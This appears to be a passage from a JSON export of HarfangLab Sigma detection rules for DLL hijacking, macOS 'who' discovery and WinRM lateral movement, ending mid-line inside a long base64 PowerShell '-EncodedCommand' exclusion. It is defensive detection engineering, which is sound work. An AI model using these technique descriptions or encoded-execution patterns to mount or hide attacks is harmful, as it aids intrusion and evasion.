"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.600625Z",
"creation_date": "2026-03-23T11:45:34.600629Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.600636Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://twitter.com/an0n_r0/status/1544472352657915904",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_verifiergui.yml",
"content": "title: DLL Hijacking via verifierg.exe\nid: 974dd9cb-ae25-42fd-972c-3f04914794a4\ndescription: |\n Detects potential Windows DLL Hijacking via verifierg.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://twitter.com/an0n_r0/status/1544472352657915904\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'verifiergui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\mfc42u.dll'\n - '\\version.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "974dd9cb-ae25-42fd-972c-3f04914794a4",
"rule_name": "DLL Hijacking via verifierg.exe",
"rule_description": "Detects potential Windows DLL Hijacking via verifierg.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9761fea2-6074-4aef-b841-6fe34bf9c564",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.081015Z",
"creation_date": "2026-03-23T11:45:34.081017Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.081021Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://thehackernews.com/2023/05/n-korean-lazarus-group-targets.html",
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_w3wp.yml",
"content": "title: DLL Hijacking via w3wp.exe\nid: 9761fea2-6074-4aef-b841-6fe34bf9c564\ndescription: |\n Detects potential Windows DLL Hijacking via w3wp.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://thehackernews.com/2023/05/n-korean-lazarus-group-targets.html\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/05/25\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'w3wp.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: 'msvcr100.dll'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9761fea2-6074-4aef-b841-6fe34bf9c564",
"rule_name": "DLL Hijacking via w3wp.exe",
"rule_description": "Detects potential Windows DLL Hijacking via w3wp.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-05-25",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "977590f0-1fe1-4403-aaa2-09929b3844b0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.627531Z",
"creation_date": "2026-03-23T11:45:34.627533Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.627537Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://attack.mitre.org/techniques/T1033/",
"https://attack.mitre.org/techniques/T1049/"
],
"name": "t1033_who_macos.yml",
"content": "title: Current Logged In Users Discovered via Who\nid: 977590f0-1fe1-4403-aaa2-09929b3844b0\ndescription: |\n Detects the execution of the who command.\n Attackers may use it during the discovery phase of an attack to retrieve the list of users currently logged in.\n It is recommended to investigate the parent process and other potential malicious actions taken by it.\nreferences:\n - https://attack.mitre.org/techniques/T1033/\n - https://attack.mitre.org/techniques/T1049/\ndate: 2022/11/14\nmodified: 2026/02/11\nauthor: HarfangLab\ntags:\n - attack.discovery\n - attack.t1033\n - attack.t1049\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Discovery\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n Image: '/usr/bin/who'\n ParentImage|contains: '?'\n\n exclusion_image:\n - ParentImage:\n - '/Applications/DockWorks.app/Contents/Library/LoginItems/DockWorks_Process'\n - '/Applications/NinjaRMMAgent/programfiles/ninjarmm-macagent'\n - '/Library/ManageEngine/UEMS_Agent/bin/dcconfig'\n - '/Library/ManageEngine/UEMS_Agent/bin/dcinventory'\n - '/Library/ManageEngine/UEMS_Agent/bin/dcnotifyservice'\n - '/usr/local/munki/Python.framework/Versions/*/Resources/Python.app/Contents/MacOS/Python'\n - '/opt/homebrew/Cellar/oh-my-posh/*/bin/oh-my-posh'\n - '/opt/homebrew/Library/Homebrew/vendor/*/bin/ruby'\n - '/opt/homebrew/Cellar/zsh/*/bin/zsh'\n - '/opt/fusioninventory-agent/bin/perl'\n - '/Applications/Zscaler/Zscaler.app/Contents/PlugIns/ZscalerService'\n - '/Applications/Zscaler/Zscaler.app/Contents/PlugIns/ZscalerTunnel'\n - GrandparentImage:\n - '/Applications/TeamViewerHost.app/Contents/MacOS/TeamViewerHost'\n - '/Library/Application Support/AirWatch/hubd'\n - '/Applications/OrbStack.app/Contents/Frameworks/OrbStack Helper.app/Contents/MacOS/OrbStack Helper'\n - '/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper (Renderer).app/Contents/MacOS/Code Helper (Renderer)'\n - '/Applications/Visual Studio Code.app/Contents/MacOS/Electron'\n - '/Users/*/Library/Application Support/Foxit Software/Continuous/Addon/Foxit PDF Reader/Applications/FoxitReaderUpdateService.app/Contents/MacOS/updater'\n - '/Applications/Raycast.app/Contents/MacOS/Raycast'\n - '/Applications/JetBrains Toolbox.app/Contents/MacOS/jetbrains-toolbox'\n - '/Applications/TeamViewer.app/Contents/MacOS/TeamViewer'\n - '/Users/*/Applications/DataGrip.app/Contents/MacOS/datagrip'\n - '/Applications/Rider.app/Contents/MacOS/rider'\n - '/Applications/ESET Endpoint Security.app/Contents/MacOS/startd'\n - '/Applications/Cursor.app/Contents/Frameworks/Cursor Helper (Plugin).app/Contents/MacOS/Cursor Helper (Plugin)'\n - '/Library/ManageEngine/UEMS_Agent/bin/dcconfig'\n\n exclusion_commandline:\n CommandLine: 'who -m'\n\n exclusion_ancestors:\n ProcessAncestors|contains:\n - '|/Applications/Visual Studio Code.app/Contents/Frameworks/Code Helper.app/Contents/MacOS/Code Helper|'\n - '|/Applications/Warp.app/Contents/MacOS/stable|'\n - '|/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/XPCServices/package_script_service.xpc/Contents/MacOS/package_script_service'\n - '|/System/Library/PrivateFrameworks/PackageKit.framework/Versions/A/Resources/system_installd'\n\n exclusion_ocsinventory:\n - ParentCommandLine: '/usr/bin/perl /Applications/OCSNG.app/Contents/Resources/ocsinventory-agent'\n - GrandparentCommandLine: '/usr/bin/perl /Applications/OCSNG.app/Contents/Resources/ocsinventory-agent'\n\n exclusion_glpi:\n - ParentImage: '/Applications/GLPI-Agent/bin/perl'\n - GrandparentImage: '/Applications/GLPI-Agent/bin/perl'\n\n exclusion_jamf:\n - ParentImage:\n - '/usr/local/jamf/bin/jamf'\n - '/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistConnector'\n - GrandparentImage:\n - '/usr/local/jamf/bin/jamf'\n - '/Library/Application Support/JAMF/Remote Assist/jamfRemoteAssistConnector'\n\n exclusion_eset:\n CurrentDirectory: '/private/tmp/PKInstallSandbox.*/Scripts/com.eset.protection.*'\n\n exclusion_teamviewer:\n CurrentDirectory: '/Applications/TeamViewerHost.app/Contents/MacOS'\n\n exclusion_zoom:\n - ParentCommandLine|startswith: '/bin/bash /Library/InstallerSandboxes/.PKInstallSandboxManager/*activeSandbox/Scripts/us.zoom.pkg.videomeeting'\n - GrandparentCommandLine|startswith: '/bin/bash /Library/InstallerSandboxes/.PKInstallSandboxManager/*.activeSandbox/Scripts/us.zoom.pkg.videomeeting.'\n - CurrentDirectory|startswith: '/Library/InstallerSandboxes/.PKInstallSandboxManager/*.activeSandbox/Scripts/us.zoom.pkg.videomeeting'\n\n condition: selection and not 1 of exclusion_*\nlevel: medium\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "977590f0-1fe1-4403-aaa2-09929b3844b0",
"rule_name": "Current Logged In Users Discovered via Who",
"rule_description": "Detects the execution of the who command.\nAttackers may use it during the discovery phase of an attack to retrieve the list of users currently logged in.\nIt is recommended to investigate the parent process and other potential malicious actions taken by it.\n",
"rule_creation_date": "2022-11-14",
"rule_modified_date": "2026-02-11",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.discovery"
],
"rule_technique_tags": [
"attack.t1033",
"attack.t1049"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9775a2f6-0523-4d7f-9270-ff581efbfee9",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.588908Z",
"creation_date": "2026-03-23T11:45:34.588912Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.588919Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_keyscramblerlogon.yml",
"content": "title: DLL Hijacking via KeyScramblerLogon.exe\nid: 9775a2f6-0523-4d7f-9270-ff581efbfee9\ndescription: |\n Detects potential Windows DLL Hijacking via KeyScramblerLogon.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.trendmicro.com/en_us/research/23/h/earth-estries-targets-government-tech-for-cyberespionage.html\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2023/10/11\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'KeyScramblerLogon.exe'\n ImageLoaded|endswith: '\\KeyScramblerIE.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\KeyScrambler\\'\n - '?:\\Program Files (x86)\\KeyScrambler\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\KeyScrambler\\'\n - '?:\\Program Files (x86)\\KeyScrambler\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'QFX Software Corporation'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9775a2f6-0523-4d7f-9270-ff581efbfee9",
"rule_name": "DLL Hijacking via KeyScramblerLogon.exe",
"rule_description": "Detects potential Windows DLL Hijacking via KeyScramblerLogon.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2023-10-11",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "97766810-30db-4302-9d9a-ee68259b35ed",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076476Z",
"creation_date": "2026-03-23T11:45:34.076478Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076482Z",
"rule_level": "medium",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.ired.team/offensive-security/lateral-movement/t1028-winrm-for-lateral-movement",
"https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement",
"https://attack.mitre.org/techniques/T1021/006/",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1021_006_winrm_process_execution.yml",
"content": "title: Suspicious Lateral Movement via WinRM\nid: 97766810-30db-4302-9d9a-ee68259b35ed\ndescription: |\n Detects suspicious process being spawned via WinRM (child of winrshost).\n Windows Remote Management is a common Windows service that is used by PowerShell Remoting.\n This can be used by an attacker to move laterally within an organisation.\n It is recommended to investigate the process created and check the network type authentication at the same time.\nreferences:\n - https://www.ired.team/offensive-security/lateral-movement/t1028-winrm-for-lateral-movement\n - https://bohops.com/2020/05/12/ws-management-com-another-approach-for-winrm-lateral-movement\n - https://attack.mitre.org/techniques/T1021/006/\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/06/16\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.006\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Script.PowerShell\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage|endswith: '?:\\Windows\\System32\\winrshost.exe'\n\n exclusion_conhost:\n Image: '?:\\Windows\\system32\\conhost.exe'\n\n exclusion_ansible:\n CommandLine:\n # ansible.windows.win_shell module – Execute shell commands on target hosts\n # https://docs.ansible.com/ansible/latest/collections/ansible/windows/win_shell_module.html\n #- '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBhAFEAQgBtAEEAQwBBAEEASwBBAEEAawBBAEYAQQBBAFUAdwBCAFcAQQBHAFUAQQBjAGcAQgB6AEEARwBrAEEAYgB3AEIAdQBBAEYAUQBBAFkAUQBCAGkAQQBHAHcAQQBaAFEAQQB1AEEARgBBAEEAVQB3AEIAVwBBAEcAVQBBAGMAZwBCAHoAQQBHAGsAQQBiAHcAQgB1AEEAQwBBAEEATABRAEIAcwBBAEgAUQBBAEkAQQBCAGIAQQBGAFkAQQBaAFEAQgB5AEEASABNAEEAYQBRAEIAdgBBAEcANABBAFgAUQBBAGkAQQBEAE0AQQBMAGcAQQB3AEEAQwBJAEEASwBRAEEAZwBBAEgAcwBBAEMAZwBBAG4AQQBIAHMAQQBJAGcAQgBtAEEARwBFAEEAYQBRAEIAcwBBAEcAVQBBAFoAQQBBAGkAQQBEAG8AQQBkAEEAQgB5AEEASABVAEEAWgBRAEEAcwBBAEMASQBBAGIAUQBCAHoAQQBHAGMAQQBJAGcAQQA2AEEAQwBJAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBnAEEASABJAEEAWgBRAEIAeABBAEgAVQBBAGEAUQBCAHkAQQBHAFUAQQBjAHcAQQBnAEEARgBBAEEAYgB3AEIAMwBBAEcAVQBBAGMAZwBCAFQAQQBHAGcAQQBaAFEAQgBzAEEARwB3AEEASQBBAEIAMgBBAEQATQBBAEwAZwBBAHcAQQBDAEEAQQBiAHcAQgB5AEEAQwBBAEEAYgBnAEIAbABBAEgAYwBBAFoAUQBCAHkAQQBDAEkAQQBmAFEAQQBuAEEAQQBvAEEAWgBRAEIANABBAEcAawBBAGQAQQBBAGcAQQBEAEUAQQBDAGcAQgA5AEEAQQBvAEEASgBBAEIAbABBAEgAZwBBAFoAUQBCAGoAQQBGADgAQQBkAHcAQgB5AEEARwBFAEEAYwBBAEIAdwBBAEcAVQBBAGMAZwBCAGYAQQBIAE0AQQBkAEEAQgB5AEEAQwBBAEEAUABRAEEAZwBBAEMAUQBBAGEAUQBCAHUAQQBIAEEAQQBkAFEAQgAwAEEAQwBBAEEAZgBBAEEAZwBBAEUAOABBAGQAUQBCADAAQQBDADAAQQBVAHcAQgAwAEEASABJAEEAYQBRAEIAdQBBAEcAYwBBAEMAZwBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQBnAEEARAAwAEEASQBBAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBGADgAQQBjAHcAQgAwAEEASABJAEEATABnAEIAVABBAEgAQQBBAGIAQQBCAHAAQQBIAFEAQQBLAEEAQgBBAEEAQwBnAEEASQBnAEIAZwBBAEQAQQBBAFkAQQBBAHcAQQBHAEEAQQBNAEEAQgBnAEEARABBAEEASQBnAEEAcABBAEMAdwBBAEkAQQBBAHkAQQBDAHcAQQBJAEEAQgBiAEEARgBNAEEAZABBAEIAeQBBAEcAawBBAGIAZwBCAG4AQQBGAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAUABBAEgAQQBBAGQAQQBCAHAAQQBHADgAQQBiAGcAQgB6AEEARgAwAEEATwBnAEEANgBBAEYASQBBAFoAUQBCAHQAQQBHADgAQQBkAGcAQgBsAEEARQBVAEEAYgBRAEIAdwBBAEgAUQBBAGUAUQBCAEYAQQBHADQAQQBkAEEAQgB5AEEARwBrAEEAWgBRAEIAegBBAEMAawBBAEMAZwBCAEoAQQBHAFkAQQBJAEEAQQBvAEEAQwAwAEEAYgBnAEIAdgBBAEgAUQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQQB1AEEARQB3AEEAWgBRAEIAdQBBAEcAYwBBAGQAQQBCAG8AQQBDAEEAQQBMAFEAQgBsAEEASABFAEEASQBBAEEAeQBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBkAEEAQgBvAEEASABJAEEAYgB3AEIAMwBBAEMAQQBBAEkAZwBCAHAAQQBHADQAQQBkAGcAQgBoAEEARwB3AEEAYQBRAEIAawBBAEMAQQBBAGMAQQBCAGgAQQBIAGsAQQBiAEEAQgB2AEEARwBFAEEAWgBBAEEAaQBBAEMAQQBBAGYAUQBBAEsAQQBGAE0AQQBaAFEAQgAwAEEAQwAwAEEAVgBnAEIAaABBAEgASQBBAGEAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwBBAEEATABRAEIATwBBAEcARQBBAGIAUQBCAGwAQQBDAEEAQQBhAGcAQgB6AEEARwA4AEEAYgBnAEIAZgBBAEgASQBBAFkAUQBCADMAQQBDAEEAQQBMAFEAQgBXAEEARwBFAEEAYgBBAEIAMQBBAEcAVQBBAEkAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABFAEEAWABRAEEASwBBAEMAUQBBAFoAUQBCADQAQQBHAFUAQQBZAHcAQgBmAEEASABjAEEAYwBnAEIAaABBAEgAQQBBAGMAQQBCAGwAQQBIAEkAQQBJAEEAQQA5AEEAQwBBAEEAVwB3AEIAVABBAEcATQBBAGMAZwBCAHAAQQBIAEEAQQBkAEEAQgBDAEEARwB3AEEAYgB3AEIAagBBAEcAcwBBAFgAUQBBADYAQQBEAG8AQQBRAHcAQgB5AEEARwBVAEEAWQBRAEIAMABBAEcAVQBBAEsAQQBBAGsAQQBIAE0AQQBjAEEAQgBzAEEARwBrAEEAZABBAEIAZgBBAEgAQQBBAFkAUQBCAHkAQQBIAFEAQQBjAHcAQgBiAEEARABBAEEAWABRAEEAcABBAEEAbwBBAEoAZwBBAGsAQQBHAFUAQQBlAEEAQgBsAEEARwBNAEEAWAB3AEIAMwBBAEgASQBBAFkAUQBCAHcAQQBIAEEAQQBaAFEAQgB5AEEAQQA9AD0A'\n #- '?:\\Windows\\system32\\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBA